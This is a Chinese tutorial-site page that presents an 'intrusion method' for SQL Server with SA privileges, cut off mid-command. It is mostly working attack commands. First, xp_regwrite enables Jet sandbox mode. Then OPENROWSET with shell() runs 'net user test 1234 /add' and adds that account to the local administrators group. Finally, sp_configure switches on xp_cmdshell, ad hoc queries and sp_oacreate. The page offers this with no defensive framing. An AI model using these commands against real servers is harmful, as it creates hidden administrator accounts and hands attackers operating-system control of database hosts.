解讀SQL Server SA權(quán)限最新入侵方法_Mssql數(shù)據(jù)庫(kù)教程
推薦:通過(guò)事務(wù)日志解決SQL Server常見(jiàn)四大故障(一)當(dāng)系統(tǒng)出現(xiàn)故障時(shí),只要存在數(shù)據(jù)日志那么就可以利用它來(lái)恢復(fù)數(shù)據(jù)解決數(shù)據(jù)庫(kù)故障。作為SQL Server數(shù)據(jù)庫(kù)管理員,了解數(shù)據(jù)日志文件的作用,以及如何利用它來(lái)解決一些數(shù)據(jù)庫(kù)的常見(jiàn)故障,這非常重要。既然事務(wù)日志這么重要,那么他到底可以用來(lái)做什么事情呢?口說(shuō)
使用jet沙盤(pán)模式,可以解決XP_cmdshell等存儲(chǔ)過(guò)程和相關(guān)動(dòng)態(tài)鏈接庫(kù)帶來(lái)的煩惱。出于安全原因,系統(tǒng)默認(rèn)情況下沙盤(pán)模式未開(kāi)啟,這就需要xp_regwrite開(kāi)啟沙盤(pán)模式:
| Exec master.dbo.xp_regwrite ''HKEY_LOCAL_MACHINE'',''SOFTWARE\Microsoft\Jet\4.0
\Engines'',''SandBoxMode'',''REG_DWORD'',1 |
然后執(zhí)行沙盤(pán)命令,在系統(tǒng)添加一個(gè)用戶名為test,密碼為1234的用戶:
| select * from openrowset(''microsoft.jet.oledb.4.0'','';database=c:\windows
\system32\ias\ias.mdb'',''select shell("cmd.exe /c net user test 1234 /add")'') select * from openrowset(''microsoft.jet.oledb.4.0'','';database=c:\windows \system32\ias\ias.mdb'',''select shell("cmd.exe /c net localgroup administrators test /add")'') |
不同的,路徑也不一樣,需要根據(jù)情況做修改:操作系統(tǒng)
NT/2K: c:\winnt\system32\
XP/2003: c:\windows\system32\
另外Microsoft SQL Server2005在默認(rèn)情況下,一些存儲(chǔ)過(guò)程是關(guān)閉著的,需要命令打開(kāi):
開(kāi)啟XP_cmdshell:
| EXEC sp_configure ''show advanced options'', 1;RECONFIGURE;EXEC sp_configure
''xp_cmdshell'', 1;RECONFIGURE; |
開(kāi)啟''OPENROWSET'':
| exec sp_configure ''show advanced options'', 1;RECONFIGURE;exec sp_configure
''Ad Hoc Distributed Queries'',1;RECONFIGURE; |
開(kāi)啟''sp_oacreate'':
| exec sp_configure ''show advanced options'', 1;RECONFIGURE;exec sp |
分享:通過(guò)事務(wù)日志解決SQL Server常見(jiàn)四大故障(二)數(shù)據(jù)庫(kù)鏡像方案有兩種鏡像運(yùn)行模式。一種是
- sql 語(yǔ)句練習(xí)與答案
- 深入C++ string.find()函數(shù)的用法總結(jié)
- SQL Server中刪除重復(fù)數(shù)據(jù)的幾個(gè)方法
- sql刪除重復(fù)數(shù)據(jù)的詳細(xì)方法
- SQL SERVER 2000安裝教程圖文詳解
- 使用sql server management studio 2008 無(wú)法查看數(shù)據(jù)庫(kù),提示 無(wú)法為該請(qǐng)求檢索數(shù)據(jù) 錯(cuò)誤916解決方法
- SQLServer日志清空語(yǔ)句(sql2000,sql2005,sql2008)
- Sql Server 2008完全卸載方法(其他版本類(lèi)似)
- sql server 2008 不允許保存更改,您所做的更改要求刪除并重新創(chuàng)建以下表
- SQL Server 2008 清空刪除日志文件(瞬間日志變幾M)
- Win7系統(tǒng)安裝MySQL5.5.21圖解教程
- 將DataTable作為存儲(chǔ)過(guò)程參數(shù)的用法實(shí)例詳解
Mssql數(shù)據(jù)庫(kù)教程Rss訂閱編程教程搜索
Mssql數(shù)據(jù)庫(kù)教程推薦
- 詳細(xì)解析SQL Server安裝sp4補(bǔ)丁報(bào)錯(cuò)的方法
- 基于SQL Server中char,nchar,varchar,nvarchar的使用區(qū)別
- 解讀經(jīng)典SQL語(yǔ)句大全
- 剖析SQL Server 2005查詢通知之基礎(chǔ)篇
- 也談如何縮小SQL SERVER日志文件
- 如何快速生成100萬(wàn)不重復(fù)的8位編號(hào)
- SQL SERVER 2008 中三種分頁(yè)方法與比較
- 解析SQL Server數(shù)據(jù)應(yīng)用在不同的數(shù)據(jù)庫(kù)中
- 如何檢測(cè)SQL Server是否有特洛伊木馬
- 如何設(shè)定sql server定期自動(dòng)備份數(shù)據(jù)庫(kù)
猜你也喜歡看這些
- mysql出現(xiàn)“Incorrect key file for table”處理方法
- mysql使用source 命令亂碼問(wèn)題解決方法
- Ubuntu下取消MySQL數(shù)據(jù)庫(kù)本機(jī)綁定限制方法
- 如何修改mysql數(shù)據(jù)庫(kù)的max_allowed_packet參數(shù)
- 深入SQLite基本操作的總結(jié)詳解
- 基于MYSQL中優(yōu)化的一些方法
- mysql密碼過(guò)期導(dǎo)致連接不上mysql
- mysql創(chuàng)建函數(shù)出現(xiàn)1418錯(cuò)誤的解決辦法
- 怎么重置mysql的自增列AUTO_INCREMENT初時(shí)值
- 查詢mysql中執(zhí)行效率低的sql語(yǔ)句的方法
- 相關(guān)鏈接:
- 教程說(shuō)明:
Mssql數(shù)據(jù)庫(kù)教程-解讀SQL Server SA權(quán)限最新入侵方法
。